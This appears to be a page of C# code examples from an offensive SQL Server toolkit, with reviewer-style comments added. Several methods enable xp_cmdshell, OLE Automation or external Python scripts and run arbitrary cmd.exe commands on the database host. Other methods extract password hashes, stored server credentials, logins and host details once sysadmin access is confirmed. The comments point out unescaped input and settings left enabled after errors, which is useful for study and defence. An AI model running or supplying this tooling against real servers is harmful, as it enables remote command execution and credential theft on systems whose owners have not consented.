Пример #1
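        /// <summary>
        /// Decides whether the caller may proceed: either the login is sysadmin on the instance, or
        /// the current Windows account appears in msdb as a member of one of the role names held in
        /// <c>roles</c>.
        /// </summary>
        /// <returns><c>true</c> when either condition holds; otherwise <c>false</c>.</returns>
        protected bool _CheckPrivilege()
        {
            // A sysadmin login skips the msdb role lookup entirely.
            if (SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                return true;
            }

            SQLDatabaseRoleMember sDRM = new SQLDatabaseRoleMember(credentials);
            sDRM.SetComputerName(computerName);
            sDRM.SetInstance(instance);
            sDRM.SetDatabase("msdb");
            sDRM.Query();

            // NOTE(review): the identity compared below is the local process's Windows account,
            // not necessarily the login carried in `credentials` - confirm that is intended when
            // SQL authentication is used.
            string currentAccount = Environment.UserDomainName + "\\" + Environment.UserName;

            foreach (var row in sDRM.GetResults())
            {
#if DEBUG
                Console.WriteLine(row.RolePrincipalName);
#endif
                if (!roles.Contains(row.RolePrincipalName))
                {
                    continue;
                }
#if DEBUG
                Console.WriteLine(row.PrincipalName + "\t" + currentAccount);
#endif
                // Fix: the previous check upper-cased only the server-side name and compared it
                // with the unmodified local name, so any account containing a lower-case letter
                // never matched. Compare both sides case-insensitively and culture-independently.
                if (string.Equals(row.PrincipalName.ToString(), currentAccount, StringComparison.OrdinalIgnoreCase))
                {
                    return true;
                }
            }

            return false;
        }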
Пример #2
        /// <summary>
        /// Runs <paramref name="query"/> as an operating-system command on the database host through
        /// the OLE Automation stored procedures, prints what the command wrote to <c>fileName</c>,
        /// then deletes that file.
        /// </summary>
        /// <remarks>
        /// Does nothing unless the login is sysadmin. The method switches on two server-wide
        /// settings ('Show Advanced Options' and 'Ole Automation Procedures') when they are off and
        /// switches them back only when <c>restoreState</c> is set and execution reaches the end of
        /// the method. SQL Server writes sp_configure changes to its error log (message 15457), so
        /// each toggle leaves a record that monitoring can alert on.
        /// </remarks>
        /// <param name="query">
        /// Command text placed after <c>cmd.exe /c</c>. It is formatted into the T-SQL batch without
        /// escaping, so a single or double quote in it changes the statement that is sent.
        /// </param>
        internal void Query(string query)
        {
            // Gate: everything below needs sysadmin (sp_configure changes and sp_OA* calls).
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                // Remember the starting value so the setting can be put back at the end.
                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                // Same pattern for the OLE Automation switch (the name xcs_value is historical).
                int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
                if (0 == xcs_value)
                {
                    Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
                }

                // Stage 1: QUERY1_1 (defined elsewhere) plus a 'run' call that redirects the
                // command's output into fileName on the server's file system.
                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY1_1);
                sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
                Console.WriteLine(App.DELIMITER);

                // Fixed one-second pause before reading the file; presumably gives the command
                // time to finish writing - a slower command may not be done yet (TODO confirm).
                System.Threading.Thread.Sleep(1000);
                // Stage 2: open fileName through 'opentextfile' and print the "output" column.
                sb.Clear();
                sb.Append(QUERY2_1);
                sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_3);
                sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_5);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

                // Stage 3: delete the temporary output file on the server.
                sb.Clear();
                sb.Append(QUERY3_1);
                sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));

                // Restore only what this call switched on, and only when restoreState is set.
                // NOTE(review): there is no try/finally, so an exception from any stage above
                // skips this and leaves both options enabled on the server.
                if (0 == xcs_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
                }
                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #3
        /// <summary>
        /// Passes <paramref name="query"/> to <c>master..xp_cmdshell</c> on the instance and prints
        /// the "output" column between two delimiter lines.
        /// </summary>
        /// <remarks>
        /// Does nothing unless the login is sysadmin. 'Show Advanced Options' and 'xp_cmdshell' are
        /// switched on when they are off, and switched back only when <c>restoreState</c> is set and
        /// execution reaches the end of the method. Both are server-wide settings; SQL Server writes
        /// sp_configure changes to its error log (message 15457), which gives defenders a record of
        /// each toggle.
        /// </remarks>
        /// <param name="query">
        /// Command text placed inside the single-quoted xp_cmdshell argument without escaping.
        /// </param>
        internal void Query(string query)
        {
            bool hasSysadmin = SQLSysadminCheck.Query(instance, computerName, credentials);
            if (!hasSysadmin)
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return;
                }

                // Record whether each option started out disabled so that only the settings
                // changed here are reverted later.
                int advancedOptionsBefore = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                bool advancedOptionsWasOff = advancedOptionsBefore == 0;
                if (advancedOptionsWasOff)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
                }

                int cmdShellBefore = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
                bool cmdShellWasOff = cmdShellBefore == 0;
                if (cmdShellWasOff)
                {
                    Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
                }

                string statement = string.Format("EXEC master..xp_cmdshell \'{0}\'", query);
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, statement, "output"));
                Console.WriteLine(App.DELIMITER);

                // NOTE(review): no try/finally guards the restore steps, so an exception above
                // leaves xp_cmdshell enabled on the server.
                if (cmdShellWasOff && restoreState)
                {
                    Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
                }

                if (advancedOptionsWasOff && restoreState)
                {
                    Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #4
        /// <summary>
        /// Builds a batch from QUERY1_1, a Python <c>subprocess.Popen</c> line that runs
        /// <paramref name="query"/> under <c>cmd.exe /c</c>, QUERY1_3 and QUERY1_4, sends it to the
        /// instance and prints the "output" column between two delimiter lines.
        /// </summary>
        /// <remarks>
        /// Does nothing unless the login is sysadmin. 'Show Advanced Options' and 'external scripts
        /// enabled' are switched on when they are off, and switched back only when
        /// <c>restoreState</c> is set and execution reaches the end of the method. Both are
        /// server-wide settings whose changes SQL Server writes to its error log.
        /// </remarks>
        /// <param name="query">
        /// Command text formatted into the double-quoted Popen argument without escaping.
        /// </param>
        internal void Query(string query)
        {
            bool hasSysadmin = SQLSysadminCheck.Query(instance, computerName, credentials);
            if (!hasSysadmin)
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return;
                }

                // Starting values are kept so only settings changed here are reverted.
                int advancedOptionsBefore = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                bool advancedOptionsWasOff = advancedOptionsBefore == 0;
                if (advancedOptionsWasOff)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                int externalScriptsBefore = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
                bool externalScriptsWasOff = externalScriptsBefore == 0;
                if (externalScriptsWasOff)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
                }

                // The QUERY1_* fragments are defined elsewhere; only the Popen line is built here.
                StringBuilder batch = new StringBuilder();
                batch.Append(QUERY1_1)
                     .AppendFormat("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query)
                     .Append(QUERY1_3)
                     .Append(QUERY1_4);
                string statement = batch.ToString();
#if DEBUG
                Console.WriteLine(statement);
#endif
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, statement, "output"));
                Console.WriteLine(App.DELIMITER);

                // NOTE(review): no try/finally guards the restore steps, so an exception above
                // leaves external script execution enabled on the server.
                if (externalScriptsWasOff && restoreState)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
                }
                if (advancedOptionsWasOff && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #5
        /// <summary>
        /// Connects to the instance, requires sysadmin, picks one of two queries based on the
        /// server's major version and stores the rows, mapped to <c>Hash</c>, in <c>hashes</c>.
        /// </summary>
        /// <returns>
        /// Always <c>false</c>.
        /// NOTE(review): the success path also returns <c>false</c>, so callers cannot use the
        /// return value to tell whether <c>hashes</c> was populated - confirm this is intended.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return false;
                }

                bool hasSysadmin = SQLSysadminCheck.Query(instance, computerName, credentials);
                if (!hasSysadmin)
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return false;
                }

                // A second helper fetches server details; only the major version is used here.
                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                serverInfo.Query();
                SQLServerInfo.Details serverDetails = serverInfo.GetResults();

                string leadingVersionPart = serverDetails.SQLServerMajorVersion.Split('.').First();
                int versionShort;
                bool parsed = int.TryParse(leadingVersionPart, out versionShort);
                if (!parsed)
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return false;
                }

                // Versions above 8 use QUERY1_1; 8 and below use QUERY2_1 (both defined elsewhere).
                string query = versionShort > 8 ? QUERY1_1 : QUERY2_1;

                hashes = sql.Query<Hash>(query, new Hash());
            }

            return false;
        }
Пример #6
        /// <summary>
        /// Queries the instance for server and host details and stores the first returned row in
        /// <c>details</c>. Two extra OS columns are requested and read only when the login is
        /// sysadmin.
        /// </summary>
        /// <returns>
        /// <c>true</c> when the first row was mapped; <c>false</c> when the connection failed, no
        /// row was returned, or reading a column threw.
        /// </returns>
        internal override bool Query()
        {
            bool isSysAdmin = false;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return false;
                }

                isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

                // The query1_* fragments are defined elsewhere; _2 and _5 are included only for
                // sysadmin logins.
                // NOTE(review): computerName is formatted into a quoted T-SQL literal without
                // escaping, so a single quote in it changes the statement that is sent.
                string query = query1_1
                    + (isSysAdmin ? query1_2 : string.Empty)
                    + string.Format("SELECT  \'{0}\' as [ComputerName],\n", computerName)
                    + query1_4
                    + (isSysAdmin ? query1_5 : string.Empty)
                    + query1_6;

                table = sql.Query(query);
            }

            // Only the first row is ever consumed: both the success and the failure path return
            // from inside the loop body.
            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    details = new Details
                    {
                        ComputerName = (string)row["ComputerName"],
                        Instance = (string)row["Instance"],
                        DomainName = (string)row["DomainName"],
                        ServiceProcessID = (int)row["ServiceProcessID"],
                        ServiceName = (string)row["ServiceName"],
                        ServiceAccount = (string)row["ServiceAccount"],
                        AuthenticationMode = (string)row["AuthenticationMode"],
                        ForcedEncryption = (int)row["ForcedEncryption"],
                        Clustered = (string)row["Clustered"],
                        SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
                        SQLServerMajorVersion = (string)row["SQLServerMajorVersion"],
                        SQLServerEdition = (string)row["SQLServerEdition"],
                        SQLServerServicePack = (string)row["SQLServerServicePack"],
                        OSArchitecture = (string)row["OSArchitecture"],
                        OsVersionNumber = (string)row["OsVersionNumber"],
                        Currentlogin = (string)row["Currentlogin"]
                    };

                    if (isSysAdmin)
                    {
                        details.OsMachineType = (string)row["OsMachineType"];
                        details.OSVersionName = (string)row["OSVersionName"];
                    }
#if DEBUG
                    Misc.PrintStruct<Details>(details);
#endif
                    return true;
                }
                catch (ArgumentNullException)
                {
                    Console.WriteLine("Empty Response");
                    return false;
                }
                catch (Exception ex)
                {
                    // Any other failure (for example a cast that does not match the column's
                    // type) is reported by message only.
                    Console.WriteLine(ex.Message);
                    return false;
                }
            }

            return false;
        }
Пример #7
        /// <summary>
        /// Builds a query in the master database from a ComputerName/Instance SELECT prefix,
        /// QUERY1_2 and the optional <c>credentialFilter</c>, runs it, and stores the rows, mapped
        /// to <c>ServerCredential</c>, in <c>serverCredentials</c>.
        /// </summary>
        /// <returns>
        /// Always <c>false</c>.
        /// NOTE(review): the success path also returns <c>false</c>, so callers cannot use the
        /// return value to tell whether <c>serverCredentials</c> was populated - confirm this is
        /// intended.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return false;
                }

                // The result is not used below; the call is kept because whether it has side
                // effects cannot be seen from this method.
                SQLSysadminCheck.Query(instance, computerName, credentials);

                // NOTE(review): computerName, instance and credentialFilter all reach the T-SQL
                // text unescaped; credentialFilter is presumably a pre-built filter fragment -
                // verify how it is constructed.
                StringBuilder statement = new StringBuilder();
                statement.AppendFormat("USE master;\nSELECT  \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance);
                statement.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(credentialFilter))
                {
                    statement.Append(credentialFilter);
                }

                string sqlText = statement.ToString();
#if DEBUG
                Console.WriteLine(sqlText);
#endif
                serverCredentials = sql.Query<ServerCredential>(sqlText, new ServerCredential());
            }

            return false;
        }
Пример #8
        /// <summary>
        /// Assembles a query from the QUERY1_* fragments (fragments _2 and _4 only for sysadmin
        /// logins), runs it, and stores the rows, mapped to <c>ServerLogin</c>, in
        /// <c>serverLogins</c>.
        /// </summary>
        /// <returns>
        /// <c>false</c> when the connection could not be opened; otherwise <c>true</c>, whether or
        /// not any rows came back.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                bool connected = sql.Connect();
                if (!connected)
                {
                    return false;
                }

                bool isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

                // Fragment contents are defined elsewhere; only their order is decided here.
                StringBuilder statement = new StringBuilder(QUERY1_1);
                if (isSysAdmin)
                {
                    statement.Append(QUERY1_2);
                }

                statement.Append(QUERY1_3);
                if (isSysAdmin)
                {
                    statement.Append(QUERY1_4);
                }

                string sqlText = statement.ToString();
#if DEBUG
                Console.WriteLine(sqlText);
#endif
                serverLogins = sql.Query<ServerLogin>(sqlText, new ServerLogin());
            }

            return true;
        }